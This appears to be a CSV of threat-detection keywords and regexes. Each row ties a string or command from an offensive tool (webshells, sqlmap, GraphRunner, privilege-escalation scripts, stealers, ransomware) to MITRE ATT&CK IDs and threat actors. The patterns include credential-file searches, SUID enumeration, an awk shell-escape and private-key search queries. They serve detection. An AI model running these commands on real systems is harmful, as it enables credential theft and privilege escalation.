"*FilelessShellcode.exe*",".{0,1000}FilelessShellcode\.exe.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","44909"
"*FilelessShellcode.sln*",".{0,1000}FilelessShellcode\.sln.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","44910"
"*FilelessShellcode.vcxproj*",".{0,1000}FilelessShellcode\.vcxproj.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","44911"
"*FileMonitor has injected FileMonitorHook into process *",".{0,1000}FileMonitor\shas\sinjected\sFileMonitorHook\sinto\sprocess\s.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","0","N/A","N/A","10","2","160","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z","44912"
"*filemsf.py*",".{0,1000}filemsf\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","44913"
"*filename = ""keycap.log""*",".{0,1000}filename\s\=\s\""keycap\.log\"".{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","0","N/A","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","44914"
"*--file-read=/etc/passwd*",".{0,1000}\-\-file\-read\=\/etc\/passwd.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","0","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","44915"
"*Files has been encrypted with hidden tear*",".{0,1000}Files\shas\sbeen\sencrypted\swith\shidden\stear.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","44916"
"*files/BindShell.exe*",".{0,1000}files\/BindShell\.exe.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","44917"
"*files/BindShell.exe*",".{0,1000}files\/BindShell\.exe.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","N/A","10","4656","1722","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z","44918"
"*files/team-edward.py*",".{0,1000}files\/team\-edward\.py.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","44919"
"*filetype:credentials* AND ((client_id OR clientID) AND (tenant) AND (secret))*",".{0,1000}filetype\:credentials.{0,1000}\sAND\s\(\(client_id\sOR\sclientID\)\sAND\s\(tenant\)\sAND\s\(secret\)\).{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","44921"
"*filetype:credentials* AND (\""AWS_ACCESS_KEY_ID\"" OR \""AWS_SECRET_ACCESS_KEY\""*",".{0,1000}filetype\:credentials.{0,1000}\sAND\s\(\\\""AWS_ACCESS_KEY_ID\\\""\sOR\s\\\""AWS_SECRET_ACCESS_KEY\\\"".{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","44922"
"*filetype:credentials* AND (begin NEAR(n=1) (RSA OR OPENSSH OR DSA OR EC OR PGP) NEAR(n=1) KEY)*",".{0,1000}filetype\:credentials.{0,1000}\sAND\s\(begin\sNEAR\(n\=1\)\s\(RSA\sOR\sOPENSSH\sOR\sDSA\sOR\sEC\sOR\sPGP\)\sNEAR\(n\=1\)\sKEY\).{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","44923"
"*filetype:pem*AND (\""BEGIN RSA PRIVATE KEY\"" OR \""BEGIN DSA PRIVATE KEY\"" OR \""BEGIN EC PRIVATE KEY\*",".{0,1000}filetype\:pem.{0,1000}AND\s\(\\\""BEGIN\sRSA\sPRIVATE\sKEY\\\""\sOR\s\\\""BEGIN\sDSA\sPRIVATE\sKEY\\\""\sOR\s\\\""BEGIN\sEC\sPRIVATE\sKEY\\.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","44924"
"*filezilla_stealer*",".{0,1000}filezilla_stealer.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","44925"
"*filezilla2john.py*",".{0,1000}filezilla2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","44926"
"*--filter=add-filters-defender-crowdstrike.json*",".{0,1000}\-\-filter\=add\-filters\-defender\-crowdstrike\.json.{0,1000}","offensive_tool_keyword","shutter","The goal of Shutter is to manage windows network stack communication via Windows Filtering Platform. Management can include blocking or permiting traffic based on IP or an executable that initiates or receives the traffic.","T1562 - T1027","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/dsnezhkov/shutter","1","0","N/A","N/A","10","2","116","15","2021-05-12T19:05:14Z","2021-05-12T18:51:03Z","44933"
"*fin3ss3g0d/ASPJinjaObfuscator*",".{0,1000}fin3ss3g0d\/ASPJinjaObfuscator.{0,1000}","offensive_tool_keyword","ASPJinjaObfuscator","Heavily obfuscated ASP web shell generation tool.","T1100 - T1027","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/fin3ss3g0d/ASPJinjaObfuscator","1","1","N/A","N/A","8","2","160","21","2024-04-26T01:27:42Z","2024-04-23T01:01:53Z","44934"
"*fin3ss3g0d/secretsdump*",".{0,1000}fin3ss3g0d\/secretsdump.{0,1000}","offensive_tool_keyword","secretsdump","secretdump.py from impacket - https://github.com/fortra/impacket","T1003.003","TA0006","Operation Wocao","Black Basta - Rhysida - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - ALLANITE","Credential Access","https://github.com/fin3ss3g0d/secretsdump.py","1","0","N/A","N/A","10","3","216","25","2023-07-31T20:08:46Z","2023-07-25T16:29:32Z","44935"
"*finalrecon.py --*",".{0,1000}finalrecon\.py\s\-\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","44936"
"*find . -name spring-beans*.jar*",".{0,1000}find\s\.\s\-name\sspring\-beans.{0,1000}\.jar.{0,1000}","offensive_tool_keyword","Spring4Shell","Spring4Shell Proof Of Concept/Information CVE-2022-22965","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/BobTheShoplifter/Spring4Shell-POC","1","0","#linux","N/A","N/A","4","366","108","2022-11-09T15:46:06Z","2022-03-30T07:54:45Z","44939"
"*find . -perm -2 -ls*",".{0,1000}find\s\.\s\-perm\s\-2\s\-ls.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 - TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","376","211","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z","44941"
"*find . -type f -name .bash_history*",".{0,1000}find\s\.\s\-type\sf\s\-name\s\.bash_history.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0007 - TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","Discovery","https://github.com/tennc/webshell","1","0","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44943"
"*find . -type f -name .bash_history*",".{0,1000}find\s\.\s\-type\sf\s\-name\s\.bash_history.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 - TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","376","211","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z","44944"
"*find . -type f -name .fetchmailrc*",".{0,1000}find\s\.\s\-type\sf\s\-name\s\.fetchmailrc.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0007 - TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","Discovery","https://github.com/tennc/webshell","1","0","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44946"
"*find . -type f -name .fetchmailrc*",".{0,1000}find\s\.\s\-type\sf\s\-name\s\.fetchmailrc.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 - TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","376","211","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z","44947"
"*find . -type f -name .htpasswd*",".{0,1000}find\s\.\s\-type\sf\s\-name\s\.htpasswd.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0007 - TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","Discovery","https://github.com/tennc/webshell","1","0","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44949"
"*find . -type f -name .htpasswd*",".{0,1000}find\s\.\s\-type\sf\s\-name\s\.htpasswd.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 - TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","376","211","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z","44950"
"*find . -type f -name service.pwd*",".{0,1000}find\s\.\s\-type\sf\s\-name\sservice\.pwd.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0007 - TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","Discovery","https://github.com/tennc/webshell","1","0","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44952"
"*find . -type f -name service.pwd*",".{0,1000}find\s\.\s\-type\sf\s\-name\sservice\.pwd.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 - TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","376","211","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z","44953"
"*find . -type f -perm -02000 -ls*",".{0,1000}find\s\.\s\-type\sf\s\-perm\s\-02000\s\-ls.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0007 - TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","Discovery","https://github.com/tennc/webshell","1","0","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44955"
"*find . -type f -perm -02000 -ls*",".{0,1000}find\s\.\s\-type\sf\s\-perm\s\-02000\s\-ls.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 - TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","376","211","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z","44956"
"*find . -type f -perm -04000 -ls*",".{0,1000}find\s\.\s\-type\sf\s\-perm\s\-04000\s\-ls.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0007 - TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","Discovery","https://github.com/tennc/webshell","1","0","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44958"
"*find . -type f -perm -04000 -ls*",".{0,1000}find\s\.\s\-type\sf\s\-perm\s\-04000\s\-ls.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 - TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","376","211","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z","44959"
"*find / * -4000 -type f -print*",".{0,1000}find\s\/\s.{0,1000}\s\-4000\s\-type\sf\s\-print.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","#linux","N/A","9","10","3575","584","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z","44960"
"*find / * -perm -2000 -type f -print*",".{0,1000}find\s\/\s.{0,1000}\s\-perm\s\-2000\s\-type\sf\s\-print.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","#linux","N/A","9","10","3575","584","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z","44961"
"*find / * -regextype egrep -iregex*\.kdbx*",".{0,1000}find\s\/\s.{0,1000}\s\-regextype\segrep\s\-iregex.{0,1000}\\\.kdbx.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","#linux","N/A","9","10","3575","584","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z","44962"
"*find / -exec /usr/bin/awk 'BEGIN {system(\""/bin/bash\""*",".{0,1000}find\s\/\s\-exec\s\/usr\/bin\/awk\s\'BEGIN\s\{system\(\\\""\/bin\/bash\\\"".{0,1000}","offensive_tool_keyword","linuxprivchecker","search for common privilege escalation vectors such as world writable files. misconfigurations. clear-text passwords and applicable exploits","T1210.001 - T1082 - T1088 - T1547.001","TA0002 - TA0004 - TA0006 - TA0007 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py","1","0","#linux","N/A","7","10","1645","524","2022-01-31T10:32:08Z","2016-04-19T13:31:46Z","44963"
"*find / -perm -2 -ls*",".{0,1000}find\s\/\s\-perm\s\-2\s\-ls.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 - TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","376","211","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z","44976"
"*find / -type f -name .bash_history*",".{0,1000}find\s\/\s\-type\sf\s\-name\s\.bash_history.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0007 - TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","Discovery","https://github.com/tennc/webshell","1","0","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44988"
"*find / -type f -name .bash_history*",".{0,1000}find\s\/\s\-type\sf\s\-name\s\.bash_history.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 - TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","376","211","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z","44989"
"*find / -type f -name .fetchmailrc*",".{0,1000}find\s\/\s\-type\sf\s\-name\s\.fetchmailrc.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0007 - TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","Discovery","https://github.com/tennc/webshell","1","0","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44991"
"*find / -type f -name .fetchmailrc*",".{0,1000}find\s\/\s\-type\sf\s\-name\s\.fetchmailrc.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 - TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","376","211","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z","44992"
"*find / -type f -name .htpasswd*",".{0,1000}find\s\/\s\-type\sf\s\-name\s\.htpasswd.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0007 - TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","Discovery","https://github.com/tennc/webshell","1","0","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44994"
"*find / -type f -name .htpasswd*",".{0,1000}find\s\/\s\-type\sf\s\-name\s\.htpasswd.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 - TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","376","211","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z","44995"
"*find / -type f -name config.inc.php*",".{0,1000}find\s\/\s\-type\sf\s\-name\sconfig\.inc\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0007 - TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","Discovery","https://github.com/tennc/webshell","1","0","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44997"
"*find / -type f -name config.inc.php*",".{0,1000}find\s\/\s\-type\sf\s\-name\sconfig\.inc\.php.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 - TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","376","211","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z","44998"
"*find / -type f -name service.pwd*",".{0,1000}find\s\/\s\-type\sf\s\-name\sservice\.pwd.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0007 - TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","Discovery","https://github.com/tennc/webshell","1","0","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","45000"
"*find / -type f -name service.pwd*",".{0,1000}find\s\/\s\-type\sf\s\-name\sservice\.pwd.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 - TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","376","211","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z","45001"
"*find / -type f -perm -02000 -ls*",".{0,1000}find\s\/\s\-type\sf\s\-perm\s\-02000\s\-ls.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0007 - TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","Discovery","https://github.com/tennc/webshell","1","0","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","45003"
"*find / -type f -perm -02000 -ls*",".{0,1000}find\s\/\s\-type\sf\s\-perm\s\-02000\s\-ls.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 - TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","376","211","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z","45004"
"*find / -type f -perm -04000 -ls*",".{0,1000}find\s\/\s\-type\sf\s\-perm\s\-04000\s\-ls.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0007 - TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","Discovery","https://github.com/tennc/webshell","1","0","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","45006"
"*find / -type f -perm -04000 -ls*",".{0,1000}find\s\/\s\-type\sf\s\-perm\s\-04000\s\-ls.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 - TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","376","211","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z","45007"
"*find /tmp/ -executable -type f 2>/dev/null*",".{0,1000}find\s\/tmp\/\s\-executable\s\-type\sf\s2\>\/dev\/null.{0,1000}","offensive_tool_keyword","Orc","Orc is a post-exploitation framework for Linux written in Bash","T1059.004 - T1036.005 - T1070.002 - T1012 - T1082 - T1003 - T1555.003 - T1049 - T1134.001 - T1202","TA0005 - TA0003 - TA0002 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/zMarch/Orc","1","0","#linux","N/A","9","4","395","53","2019-11-12T18:21:27Z","2018-08-16T11:31:39Z","45013"
"*find /var/tmp -executable -type f 2>/dev/null*",".{0,1000}find\s\/var\/tmp\s\-executable\s\-type\sf\s2\>\/dev\/null.{0,1000}","offensive_tool_keyword","Orc","Orc is a post-exploitation framework for Linux written in Bash","T1059.004 - T1036.005 - T1070.002 - T1012 - T1082 - T1003 - T1555.003 - T1049 - T1134.001 - T1202","TA0005 - TA0003 - TA0002 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/zMarch/Orc","1","0","#linux","N/A","9","4","395","53","2019-11-12T18:21:27Z","2018-08-16T11:31:39Z","45015"
"*find* -perm -4000 *",".{0,1000}find.{0,1000}\s\-perm\s\-4000\s.{0,1000}","offensive_tool_keyword","linuxprivchecker","search for common privilege escalation vectors such as world writable files. misconfigurations. clear-text passwords and applicable exploits","T1210.001 - T1082 - T1088 - T1547.001","TA0002 - TA0004 - TA0006 - TA0007 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py","1","0","#linux","N/A","7","10","1645","524","2022-01-31T10:32:08Z","2016-04-19T13:31:46Z","45016"
"*find_and_load_coerce_methods*",".{0,1000}find_and_load_coerce_methods.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","45017"
"*find_domain.sh *",".{0,1000}find_domain\.sh\s.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","0","#linux","N/A","8","4","337","63","2024-10-01T11:22:01Z","2016-05-20T04:32:41Z","45018"
"*find_payload(*",".{0,1000}find_payload\(.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - 